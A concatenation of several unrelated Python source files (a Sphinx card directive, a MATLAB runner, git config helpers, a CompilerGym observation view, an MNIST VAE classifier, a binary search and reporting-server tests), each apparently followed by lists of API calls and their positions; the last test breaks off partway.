"""Create the header, body, or footer."""
component = create_component(
f"card-{name}", [f"sd-card-{name}"] + options.get(f"class-{name}", [])
)
inst.set_source_info(component) # TODO set proper lines
inst.state.nested_parse(content, offset, component)
cls.add_card_child_classes(component)
return component
@staticmethod
def add_card_child_classes(node):
"""Add classes to specific child nodes."""
for para in node.traverse(nodes.paragraph):
para["classes"] = ([] if "classes" not in para else para["classes"]) + [
"sd-card-text"
]
# for title in node.traverse(nodes.title):
# title["classes"] = ([] if "classes" not in title else title["classes"]) + [
# "sd-card-title"
# ]
class CardCarouselDirective(SphinxDirective):
"""A component, which is a container for cards in a single scrollable row."""
has_content = True
required_arguments = 1 # columns
optional_arguments = 0
option_spec = {
"class": directives.class_option,
}
def run(self) -> List[nodes.Node]:
"""Run the directive."""
self.assert_has_content()
try:
cols = make_choice([str(i) for i in range(1, 13)])(
self.arguments[0].strip()
)
except ValueError as exc:
raise self.error(f"Invalid directive argument: {exc}")
container = create_component(
"card-carousel",
["sd-sphinx-override", "sd-cards-carousel", f"sd-card-cols-{cols}"]
+ self.options.get("class", []),
)
self.set_source_info(container)
self.state.nested_parse(self.content, self.content_offset, container)
for item in container.children:
if not is_component(item, "card"):
LOGGER.warning(
"All children of a 'card-carousel' "
f"should be 'card' [{WARNING_TYPE}.card]",
location=item,
type=WARNING_TYPE,
subtype="card",
)
break
return [container]
|
[
"sphinx.util.logging.getLogger",
"docutils.nodes.reference",
"docutils.nodes.Text",
"docutils.nodes.image",
"re.compile"
] |
[((510, 529), 'sphinx.util.logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (519, 529), False, 'from sphinx.util.logging import getLogger\n'), ((617, 644), 're.compile', 're.compile', (['"""^\\\\^{3,}\\\\s*$"""'], {}), "('^\\\\^{3,}\\\\s*$')\n", (627, 644), False, 'import re\n'), ((659, 686), 're.compile', 're.compile', (['"""^\\\\+{3,}\\\\s*$"""'], {}), "('^\\\\+{3,}\\\\s*$')\n", (669, 686), False, 'import re\n'), ((3458, 3551), 'docutils.nodes.image', 'nodes.image', (['""""""'], {'uri': "options['img-top']", 'alt': '"""card-img-top"""', 'classes': "['sd-card-img-top']"}), "('', uri=options['img-top'], alt='card-img-top', classes=[\n 'sd-card-img-top'])\n", (3469, 3551), False, 'from docutils import nodes\n'), ((4757, 4859), 'docutils.nodes.image', 'nodes.image', (['""""""'], {'uri': "options['img-bottom']", 'alt': '"""card-img-bottom"""', 'classes': "['sd-card-img-bottom']"}), "('', uri=options['img-bottom'], alt='card-img-bottom', classes=[\n 'sd-card-img-bottom'])\n", (4768, 4859), False, 'from docutils import nodes\n'), ((3033, 3129), 'docutils.nodes.image', 'nodes.image', ([], {'uri': "options['img-background']", 'classes': "['sd-card-img']", 'alt': '"""background image"""'}), "(uri=options['img-background'], classes=['sd-card-img'], alt=\n 'background image')\n", (3044, 3129), False, 'from docutils import nodes\n'), ((5142, 5220), 'docutils.nodes.reference', 'nodes.reference', (['""""""', '""""""'], {'refuri': "options['link']", 'classes': "['sd-stretched-link']"}), "('', '', refuri=options['link'], classes=['sd-stretched-link'])\n", (5157, 5220), False, 'from docutils import nodes\n'), ((5892, 5906), 'docutils.nodes.Text', 'nodes.Text', (['""""""'], {}), "('')\n", (5902, 5906), False, 'from docutils import nodes\n')]
|
import os
from resqueue import utils
class Matlab(object):
""" very preliminary, initial matlab class
to support matlab computing
"""
def __init__(self, matfile, cmd=None):
self.matfile = matfile
self.cmd = cmd
def _file_exists(self):
if not os.path.isfile(self.matfile):
raise Exception("file cannot be found: matfile")
def _add_prefix_suffix(self):
""" method reads in the matlab script and makes it
a function so that it can be called via the malab
terminal command
"""
with open(self.matfile, 'r') as mfile:
matfile = mfile.read()
self.prefix = "function[proxy]=resmat()\n"
self.suffix = "\nend\n"
self.mat_text = self.prefix + matfile + self.suffix
new_path = os.path.join(os.path.dirname(self.matfile), "resmat.m")
with open(new_path, 'w') as mfile:
mfile.write(self.mat_text)
self.edited_matfile = new_path
def _mlabcmd(self):
if self.cmd is None:
self.cmd = "matlab -nodesktop -nojvm -nodisplay -r"
self.cmd = self.cmd + " resmat();quit"
def run(self):
self._file_exists()
self._add_prefix_suffix()
self._mlabcmd()
if os.getcwd() != os.path.dirname(self.edited_matfile):
os.chdir(os.path.dirname(self.edited_matfile))
return utils.shell(self.cmd.split())
|
[
"os.getcwd",
"os.path.isfile",
"os.path.dirname"
] |
[((293, 321), 'os.path.isfile', 'os.path.isfile', (['self.matfile'], {}), '(self.matfile)\n', (307, 321), False, 'import os\n'), ((830, 859), 'os.path.dirname', 'os.path.dirname', (['self.matfile'], {}), '(self.matfile)\n', (845, 859), False, 'import os\n'), ((1280, 1291), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1289, 1291), False, 'import os\n'), ((1295, 1331), 'os.path.dirname', 'os.path.dirname', (['self.edited_matfile'], {}), '(self.edited_matfile)\n', (1310, 1331), False, 'import os\n'), ((1354, 1390), 'os.path.dirname', 'os.path.dirname', (['self.edited_matfile'], {}), '(self.edited_matfile)\n', (1369, 1390), False, 'import os\n')]
|
# Copyright (c) 2021 <NAME> <<EMAIL>>
# This file is part of the "cgitize" project.
# For details, see https://github.com/egor-tensin/cgitize.
# Distributed under the MIT License.
from contextlib import contextmanager
import os
from cgitize import utils
GIT_ENV = os.environ.copy()
GIT_ENV['GIT_SSH_COMMAND'] = 'ssh -oBatchMode=yes -oLogLevel=QUIET -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null'
class Config:
def __init__(self, path):
self.path = path
def exists(self):
return os.path.exists(self.path)
def open(self, mode='r'):
return open(self.path, mode=mode, encoding='utf-8')
def read(self):
with self.open(mode='r') as fd:
return fd.read()
def write(self, contents):
with self.open(mode='w') as fd:
fd.write(contents)
@contextmanager
def backup(self):
old_contents = self.read()
try:
yield old_contents
finally:
self.write(old_contents)
# What follows is an exteremely loose interpretation of what the .gitconfig
# syntax is. The source was git-config(1).
class Section:
def __init__(self, name, variables):
Config.Section.validate_name(name)
self.name = name
self.variables = variables
@staticmethod
def validate_name(name):
if not name:
raise RuntimeError('section names cannot be empty')
for c in name:
if c.isalnum() or c == '-' or c == '.':
continue
raise RuntimeError(f'section names must only contain alphanumeric characters, . or -: {name}')
@staticmethod
def format_name(name):
return name
def format(self):
result = f'[{self.format_name(self.name)}]\n'
result += ''.join((var.format() for var in self.variables))
return result
class Subsection:
def __init__(self, section, name, variables):
Config.Section.validate_name(section)
Config.Subsection.validate_name(name)
self.section = section
self.name = name
self.variables = variables
@staticmethod
def validate_name(name):
if '\n' in name:
raise RuntimeError(f'subsection names cannot contain newlines: {name}')
def format_name(self):
name = self.name
# Escape the backslashes:
name = name.replace('\\', '\\\\')
# Escape the quotes:
name = name.replace('"', '\\"')
# Put in quotes:
return f'"{name}"'
def format(self):
result = f'[{Config.Section.format_name(self.section)} {self.format_name()}]\n'
result += ''.join((var.format() for var in self.variables))
return result
class Variable:
def __init__(self, name, value):
Config.Variable.validate_name(name)
Config.Variable.validate_value(value)
self.name = name
self.value = value
@staticmethod
def validate_name(name):
if not name:
raise RuntimeError('variable names cannot be empty')
for c in name:
if c.isalnum() or c == '-':
continue
raise RuntimeError(f'variable name can only contain alphanumeric characters or -: {name}')
if not name[0].isalnum():
raise RuntimeError(f'variable name must start with an alphanumeric character: {name}')
@staticmethod
def validate_value(value):
pass
def format_name(self):
return self.name
def format_value(self):
value = self.value
# Escape the backslashes:
value = value.replace('\\', '\\\\')
# Escape the supported escape sequences (\n, \t and \b):
value = value.replace('\n', '\\n')
value = value.replace('\t', '\\t')
value = value.replace('\b', '\\b')
# Escape the quotes:
value = value.replace('"', '\\"')
# Put in quotes:
value = f'"{value}"'
return value
def format(self):
return f' {self.format_name()} = {self.format_value()}\n'
class Git:
EXE = 'git'
@staticmethod
def check(*args, **kwargs):
return utils.try_run(Git.EXE, *args, env=GIT_ENV, **kwargs)
@staticmethod
def capture(*args, **kwargs):
return utils.try_run_capture(Git.EXE, *args, env=GIT_ENV, **kwargs)
@staticmethod
def get_global_config():
return Config(os.path.expanduser('~/.gitconfig'))
@staticmethod
@contextmanager
def setup_auth(repo):
if not repo.url_auth:
yield
return
config = Git.get_global_config()
with utils.protected_file(config.path):
with config.backup() as old_contents:
variables = [Config.Variable('insteadOf', repo.clone_url)]
subsection = Config.Subsection('url', repo.clone_url_with_auth, variables)
new_contents = f'{old_contents}\n{subsection.format()}'
config.write(new_contents)
yield
|
[
"cgitize.utils.try_run",
"cgitize.utils.protected_file",
"os.environ.copy",
"cgitize.utils.try_run_capture",
"os.path.exists",
"os.path.expanduser"
] |
[((268, 285), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (283, 285), False, 'import os\n'), ((521, 546), 'os.path.exists', 'os.path.exists', (['self.path'], {}), '(self.path)\n', (535, 546), False, 'import os\n'), ((4475, 4527), 'cgitize.utils.try_run', 'utils.try_run', (['Git.EXE', '*args'], {'env': 'GIT_ENV'}), '(Git.EXE, *args, env=GIT_ENV, **kwargs)\n', (4488, 4527), False, 'from cgitize import utils\n'), ((4596, 4656), 'cgitize.utils.try_run_capture', 'utils.try_run_capture', (['Git.EXE', '*args'], {'env': 'GIT_ENV'}), '(Git.EXE, *args, env=GIT_ENV, **kwargs)\n', (4617, 4656), False, 'from cgitize import utils\n'), ((4727, 4761), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.gitconfig"""'], {}), "('~/.gitconfig')\n", (4745, 4761), False, 'import os\n'), ((4949, 4982), 'cgitize.utils.protected_file', 'utils.protected_file', (['config.path'], {}), '(config.path)\n', (4969, 4982), False, 'from cgitize import utils\n')]
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Callable, Dict, List
from gym.spaces import Space
from compiler_gym.service import observation2py, observation_t
from compiler_gym.service.proto import Observation, ObservationRequest, ObservationSpace
from compiler_gym.views.observation_space_spec import ObservationSpaceSpec
class ObservationView(object):
"""A view into the available observation spaces of a service.
Example usage:
>>> env = gym.make("llvm-v0")
>>> env.reset()
>>> env.observation.spaces.keys()
["Autophase", "Ir"]
>>> env.observation.spaces["Autophase"].space
Box(56,)
>>> env.observation["Autophase"]
[0, 1, ..., 2]
>>> observation["Ir"]
int main() {...}
"""
def __init__(
self,
get_observation: Callable[[ObservationRequest], Observation],
spaces: List[ObservationSpace],
):
if not spaces:
raise ValueError("No observation spaces")
self.spaces = {
s.name: ObservationSpaceSpec.from_proto(i, s) for i, s in enumerate(spaces)
}
self.session_id = -1
self._get_observation = get_observation
self._base_spaces: Dict[str, Space] = {}
self._translate_cbs: Dict[str, Callable[[observation_t], observation_t]] = {}
def __getitem__(self, observation_space: str) -> observation_t:
"""Request an observation from the given space.
:param observation_space: The observation space to query.
:return: An observation.
:raises KeyError: If the requested observation space does not exist.
"""
request = ObservationRequest(
session_id=self.session_id,
observation_space=self.spaces[observation_space].index,
)
return self.translate(
observation_space,
observation2py(
self._base_spaces.get(
observation_space, self.spaces[observation_space].space
),
self._get_observation(request),
),
)
# TODO(cummins): Register an opaque_data_format handler that replaces the
# "Space" and updates observation2py / observation2str.
def register_derived_space(
self,
base_name: str,
derived_name: str,
derived_space: Space,
cb: Callable[[observation_t], observation_t],
) -> None:
"""Add a hook for implementing derived observation spaces.
Subclasses of ObservationView call this method in their
:code:`__init__()` after initializing the base class to register new
observation spaces that are derived from those provided by the
CompilerService.
Example usage:
Suppose we have a service that provides a "src" observation space
that returns a string of source code. We want to create a new
observation space, "src_len", that returns the length of the source
code. We do this by calling :code:`register_derived_space()` and
providing the a callback to translate from the base observation space
to the derived value:
.. code-block:: python
class MyObservationView(ObservationView):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.register_derived_space(
derived_name="src_len",
base_name="src",
derived_space=Box(low=0, high=float("inf"), shape=(1,), dtype=int),
derive=lambda src: [len(src)],
)
Now we can request for "src_len" observation space and receive
observations from this new derived space.
>>> env.observation["src_len"]
[1021,]
:param base_name: The name of the observation space that this new
observation space is derived from.
:param derived_name: The name of the derived observation space
"""
base_spec = self.spaces[base_name]
spec = ObservationSpaceSpec(id=derived_name, space=derived_space)
spec.index = base_spec.index
spec.deterministic = base_spec.deterministic
spec.platform_dependent = base_spec.platform_dependent
self.spaces[derived_name] = spec
self._translate_cbs[derived_name] = cb
def __repr__(self):
return f"ObservationView[{', '.join(sorted(self.spaces.keys()))}]"
def translate(
self, observation_space: str, observation: observation_t
) -> observation_t:
"""Translate an observation according to the space.
This methods translates the value returned by a CompilerSpace according
to any derived observation spaces, as registered using
register_derived_space(). If the requested observation space is not
derived the observation is returned unmodified.
:param observation_space: The name of the observation space.
:param observation: An observation returned by a CompilerService.
:return: An observation, after applying any derived space translations.
"""
return self._translate_cbs.get(observation_space, lambda x: x)(observation)
|
[
"compiler_gym.service.proto.ObservationRequest",
"compiler_gym.views.observation_space_spec.ObservationSpaceSpec.from_proto",
"compiler_gym.views.observation_space_spec.ObservationSpaceSpec"
] |
[((1779, 1886), 'compiler_gym.service.proto.ObservationRequest', 'ObservationRequest', ([], {'session_id': 'self.session_id', 'observation_space': 'self.spaces[observation_space].index'}), '(session_id=self.session_id, observation_space=self.\n spaces[observation_space].index)\n', (1797, 1886), False, 'from compiler_gym.service.proto import Observation, ObservationRequest, ObservationSpace\n'), ((4223, 4281), 'compiler_gym.views.observation_space_spec.ObservationSpaceSpec', 'ObservationSpaceSpec', ([], {'id': 'derived_name', 'space': 'derived_space'}), '(id=derived_name, space=derived_space)\n', (4243, 4281), False, 'from compiler_gym.views.observation_space_spec import ObservationSpaceSpec\n'), ((1156, 1193), 'compiler_gym.views.observation_space_spec.ObservationSpaceSpec.from_proto', 'ObservationSpaceSpec.from_proto', (['i', 's'], {}), '(i, s)\n', (1187, 1193), False, 'from compiler_gym.views.observation_space_spec import ObservationSpaceSpec\n')]
|
import torch
from torch.autograd import Variable
import torch.nn as nn
from torchvision import datasets, transforms
from torch.utils.data import DataLoader
import torch.optim as optim
import math
import numpy as np
import os
import torch.nn.functional as F
import torch.nn.init as init
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
class Classification(nn.Module):
def __init__(self, z_dim=2):
super(Classification, self).__init__()
self.z_dim = z_dim
self.net = nn.Sequential(
nn.Linear(z_dim, 10),
nn.ReLU(True),
nn.Linear(10, 10),
)
self.weight_init()
def weight_init(self, mode='normal'):
initializer = normal_init
for block in self._modules:
for m in self._modules[block]:
initializer(m)
def forward(self, z):
return self.net(z).squeeze()
class CNNVAE1(nn.Module):
def __init__(self, z_dim=2):
super(CNNVAE1, self).__init__()
self.z_dim = z_dim
self.encode = nn.Sequential(
nn.Conv2d(1, 28, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(28, 28, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(28, 56, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(56, 118, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(118, 2 * z_dim, 1),
)
self.decode = nn.Sequential(
nn.Conv2d(z_dim, 118, 1),
nn.ReLU(True),
nn.ConvTranspose2d(118, 118, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(118, 56, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(56, 28, 4, 1),
nn.ReLU(True),
nn.ConvTranspose2d(28, 28, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(28, 1, 4, 2, 1),
nn.Sigmoid(),
)
def reparametrize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = std.data.new(std.size()).normal_()
return eps.mul(std).add_(mu)
def forward(self, x, no_dec=False, no_enc=False):
if no_enc:
gen_z = Variable(torch.randn(49, z_dim), requires_grad=False)
gen_z = gen_z.to(device)
return self.decode(gen_z).view(x.size())
if no_dec:
stats = self.encode(x)
mu = stats[:, :self.z_dim]
logvar = stats[:, self.z_dim:]
z = self.reparametrize(mu, logvar)
return z.squeeze()
else:
stats = self.encode(x.view(-1, 784))
mu = stats[:, :self.z_dim]
logvar = stats[:, self.z_dim:]
z = self.reparametrize(mu, logvar)
x_recon = self.decode(z).view(x.size())
return x_recon, mu, logvar, z.squeeze()
def normal_init(m):
if isinstance(m, (nn.Linear, nn.Conv2d)):
init.normal(m.weight, 0, 0.02)
if m.bias is not None:
m.bias.data.fill_(0)
elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.fill_(0)
def recon_loss(x_recon, x):
n = x.size(0)
loss = F.binary_cross_entropy(x_recon, x, size_average=False).div(n)
return loss
def kl_divergence(mu, logvar):
kld = -0.5 * (1 + logvar - mu ** 2 - logvar.exp()).sum(1).mean()
return kld
use_cuda = torch.cuda.is_available()
device = 'cuda' if use_cuda else 'cpu'
print('This code is running over', device)
max_iter = int(20)
batch_size = 100
z_dim = 2
lr_C = 0.001
beta1_C = 0.9
beta2_C = 0.999
z_dim = 2
training_set = datasets.MNIST('./tmp/MNIST', train=True, download=True, transform=transforms.ToTensor())
test_set = datasets.MNIST('./tmp/MNIST', train=False, download=True, transform=transforms.ToTensor())
data_loader = DataLoader(training_set, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(test_set, batch_size=10000, shuffle=True, num_workers=3)
VAE = CNNVAE1().to(device)
VAE.load_state_dict(torch.load('./Info_VAE_CNN'))
C = Classification().to(device)
optim_C = optim.Adam(C.parameters(), lr=0.005, betas=(beta1_C, beta2_C))
criterion = nn.CrossEntropyLoss()
print('Network is loaded')
Result = []
for epoch in range(max_iter):
train_loss = 0
for batch_idx, (x_true, target) in enumerate(data_loader):
x_true, target = x_true.to(device), target.to(device)
z = VAE(x_true, no_dec=True)
outputs = C(z)
loss = criterion(outputs, target)
optim_C.zero_grad()
loss.backward()
optim_C.step()
train_loss += loss.item()
if batch_idx % 100 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)] \t Loss: {:.6f} '.format(epoch, batch_idx * len(x_true),
len(data_loader.dataset),
100. * batch_idx / len(data_loader),
loss.item(),
))
print('====> Epoch: {}, \t Average loss: {:.4f}'
.format(epoch, train_loss / (batch_idx + 1)))
Result.append(('====>epoch:', epoch,
'loss:', train_loss / (batch_idx + 1),
))
(x_test, labels) = iter(test_loader).next()
x_test, labels = x_test.to(device), labels.to(device)
z = VAE(x_test.to(device), no_dec=True)
outputs = C(z)
_, predicted = torch.max(outputs.data, 1)
Accuracy = (predicted == labels).sum().item()/x_test.size(0)
Result.append(Accuracy)
with open("InfoAccuracyCNN.txt", "w") as output:
output.write(str(Result))
|
[
"torch.nn.functional.binary_cross_entropy",
"torch.nn.ReLU",
"torch.nn.ConvTranspose2d",
"torch.utils.data.DataLoader",
"warnings.filterwarnings",
"torch.load",
"torch.nn.Conv2d",
"torch.nn.CrossEntropyLoss",
"torch.randn",
"torch.nn.Sigmoid",
"torch.nn.init.normal",
"torch.max",
"torch.cuda.is_available",
"torch.nn.Linear",
"torchvision.transforms.ToTensor"
] |
[((360, 393), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (383, 393), False, 'import warnings\n'), ((3431, 3456), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3454, 3456), False, 'import torch\n'), ((3862, 3923), 'torch.utils.data.DataLoader', 'DataLoader', (['training_set'], {'batch_size': 'batch_size', 'shuffle': '(True)'}), '(training_set, batch_size=batch_size, shuffle=True)\n', (3872, 3923), False, 'from torch.utils.data import DataLoader\n'), ((3938, 4005), 'torch.utils.data.DataLoader', 'DataLoader', (['test_set'], {'batch_size': '(10000)', 'shuffle': '(True)', 'num_workers': '(3)'}), '(test_set, batch_size=10000, shuffle=True, num_workers=3)\n', (3948, 4005), False, 'from torch.utils.data import DataLoader\n'), ((4204, 4225), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (4223, 4225), True, 'import torch.nn as nn\n'), ((5613, 5639), 'torch.max', 'torch.max', (['outputs.data', '(1)'], {}), '(outputs.data, 1)\n', (5622, 5639), False, 'import torch\n'), ((4055, 4083), 'torch.load', 'torch.load', (['"""./Info_VAE_CNN"""'], {}), "('./Info_VAE_CNN')\n", (4065, 4083), False, 'import torch\n'), ((2917, 2947), 'torch.nn.init.normal', 'init.normal', (['m.weight', '(0)', '(0.02)'], {}), '(m.weight, 0, 0.02)\n', (2928, 2947), True, 'import torch.nn.init as init\n'), ((3722, 3743), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (3741, 3743), False, 'from torchvision import datasets, transforms\n'), ((3824, 3845), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (3843, 3845), False, 'from torchvision import datasets, transforms\n'), ((581, 601), 'torch.nn.Linear', 'nn.Linear', (['z_dim', '(10)'], {}), '(z_dim, 10)\n', (590, 601), True, 'import torch.nn as nn\n'), ((615, 628), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (622, 628), True, 'import torch.nn as nn\n'), ((642, 659), 'torch.nn.Linear', 'nn.Linear', (['(10)', '(10)'], {}), '(10, 10)\n', (651, 659), True, 'import torch.nn as nn\n'), ((1129, 1154), 'torch.nn.Conv2d', 'nn.Conv2d', (['(1)', '(28)', '(4)', '(2)', '(1)'], {}), '(1, 28, 4, 2, 1)\n', (1138, 1154), True, 'import torch.nn as nn\n'), ((1168, 1181), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1175, 1181), True, 'import torch.nn as nn\n'), ((1195, 1221), 'torch.nn.Conv2d', 'nn.Conv2d', (['(28)', '(28)', '(4)', '(2)', '(1)'], {}), '(28, 28, 4, 2, 1)\n', (1204, 1221), True, 'import torch.nn as nn\n'), ((1235, 1248), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1242, 1248), True, 'import torch.nn as nn\n'), ((1262, 1288), 'torch.nn.Conv2d', 'nn.Conv2d', (['(28)', '(56)', '(4)', '(2)', '(1)'], {}), '(28, 56, 4, 2, 1)\n', (1271, 1288), True, 'import torch.nn as nn\n'), ((1302, 1315), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1309, 1315), True, 'import torch.nn as nn\n'), ((1329, 1356), 'torch.nn.Conv2d', 'nn.Conv2d', (['(56)', '(118)', '(4)', '(2)', '(1)'], {}), '(56, 118, 4, 2, 1)\n', (1338, 1356), True, 'import torch.nn as nn\n'), ((1370, 1383), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1377, 1383), True, 'import torch.nn as nn\n'), ((1397, 1425), 'torch.nn.Conv2d', 'nn.Conv2d', (['(118)', '(2 * z_dim)', '(1)'], {}), '(118, 2 * z_dim, 1)\n', (1406, 1425), True, 'import torch.nn as nn\n'), ((1486, 1510), 'torch.nn.Conv2d', 'nn.Conv2d', (['z_dim', '(118)', '(1)'], {}), '(z_dim, 118, 1)\n', (1495, 1510), True, 'import torch.nn as nn\n'), ((1524, 1537), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1531, 1537), True, 'import torch.nn as nn\n'), ((1551, 1588), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(118)', '(118)', '(4)', '(2)', '(1)'], {}), '(118, 118, 4, 2, 1)\n', (1569, 1588), True, 'import torch.nn as nn\n'), ((1602, 1615), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1609, 1615), True, 'import torch.nn as nn\n'), ((1629, 1665), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(118)', '(56)', '(4)', '(2)', '(1)'], {}), '(118, 56, 4, 2, 1)\n', (1647, 1665), True, 'import torch.nn as nn\n'), ((1679, 1692), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1686, 1692), True, 'import torch.nn as nn\n'), ((1706, 1738), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(56)', '(28)', '(4)', '(1)'], {}), '(56, 28, 4, 1)\n', (1724, 1738), True, 'import torch.nn as nn\n'), ((1752, 1765), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1759, 1765), True, 'import torch.nn as nn\n'), ((1779, 1814), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(28)', '(28)', '(4)', '(2)', '(1)'], {}), '(28, 28, 4, 2, 1)\n', (1797, 1814), True, 'import torch.nn as nn\n'), ((1828, 1841), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (1835, 1841), True, 'import torch.nn as nn\n'), ((1855, 1889), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['(28)', '(1)', '(4)', '(2)', '(1)'], {}), '(28, 1, 4, 2, 1)\n', (1873, 1889), True, 'import torch.nn as nn\n'), ((1903, 1915), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (1913, 1915), True, 'import torch.nn as nn\n'), ((3223, 3277), 'torch.nn.functional.binary_cross_entropy', 'F.binary_cross_entropy', (['x_recon', 'x'], {'size_average': '(False)'}), '(x_recon, x, size_average=False)\n', (3245, 3277), True, 'import torch.nn.functional as F\n'), ((2195, 2217), 'torch.randn', 'torch.randn', (['(49)', 'z_dim'], {}), '(49, z_dim)\n', (2206, 2217), False, 'import torch\n')]
|
import math
from quick_sort import quick_sort
import numpy
import time
import matplotlib.pyplot as plt
def binary_search(sortedarray, key):
left = 0
right = len(sortedarray) - 1
while left <= right:
mid = math.floor((left + right) / 2)
if key == sortedarray[mid]:
return mid
else:
if key < sortedarray[mid]:
right = mid -1
else:
left = mid + 1
return -1
#x = [49, 50, 50, 50, 900]
#mykey = 50
#print(binary_search(x, mykey))
|
[
"math.floor"
] |
[((211, 241), 'math.floor', 'math.floor', (['((left + right) / 2)'], {}), '((left + right) / 2)\n', (221, 241), False, 'import math\n')]
|
# Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``test_reporting_server.py``
`Unittests for reporting server functions`
"""
import sys
import os
import pytest
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../reporting')))
from reporting.reporting_server import XMLReportingServer, imp_plugins
xmlrpcsrv = XMLReportingServer()
@pytest.fixture(scope="function", autouse=True)
def reporting_server():
opts = {'loglevel': 'DEBUG', 'logprefix': 'main', 'port': '18081', 'logdir': 'logs', 'multiuser': True}
class CustomOptsParser(object):
def __init__(self):
self.multiuser = True
self.port = '18081'
self.logprefix = 'main'
self.logdir = 'logs'
self.loglevel = 'DEBUG'
opts = CustomOptsParser()
xmlrpcsrv = XMLReportingServer()
xmlrpcsrv.setup(opts)
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "../plugins/", './')))
imp_plugins("reports")
imp_plugins("connectors")
return xmlrpcsrv
@pytest.fixture(scope="function", autouse=True)
def reporting_server_with_config(reporting_server):
reporting_server.xmlrpc_open("test_client-1")
reporting_server.xmlrpc_reportadd("test_client-1", "xml")
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "options", [['update', None]])
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "cfgfile", None)
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", None)
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", ['chipName', 'SomeSwitch'])
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", ['TM buildname', '192.168.127.12-SomeSwitch'])
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html")
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlcfg", None)
return reporting_server
def test_client_config(reporting_server):
"""Verify that client config can be created and reports can be removed.
"""
reporting_server.xmlrpc_open("test_client-1")
# check if status of client is Active
assert reporting_server.clients.get("test_client-1", "status") == "Active"
# add xml report
reporting_server.xmlrpc_reportadd("test_client-1", "xml")
assert reporting_server.clients.get("test_client-1", "reports") == {"xml": True}
reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html")
# check attr on report object
assert reporting_server._reports['XML']['test_client-1'].htmlfile == "1.html"
reporting_server.xmlrpc_shutdown()
def test_post(reporting_server_with_config):
"""Verify that post command is True.
"""
post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname",
"Run", ['Simple brief of test case', '-# First step\n-# Second step'],
{'platform': 'SomeSwitch', 'build': '192.168.127.12-SomeSwitch'}, "None"]
# Check if post successful
assert reporting_server_with_config.xmlrpc_post(*post_data1), "xmlrpc_post operation is False"
# Check if queuelen works
def test_queue(reporting_server_with_config):
"""Verify that operation with queue is working.
"""
expected_queuelist = [{'status': 'Run', 'info': {'platform': 'SomeSwitch',
'build': '1.2.3.4-SomeSwitch'}, 'client': 'test_client-1',
'build': 'SomeSwitch',
'report': ['Simple brief of test case', '-# First step\n-# Second step'],
'suite': 'test.test_suite', 'tc': 'test_tcname', 'build_info': 'None'}]
post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname",
"Run", ['Simple brief of test case', '-# First step\n-# Second step'],
{'platform': 'SomeSwitch', 'build': '1.2.3.4-SomeSwitch'}, "None"]
# Check if queue is empty
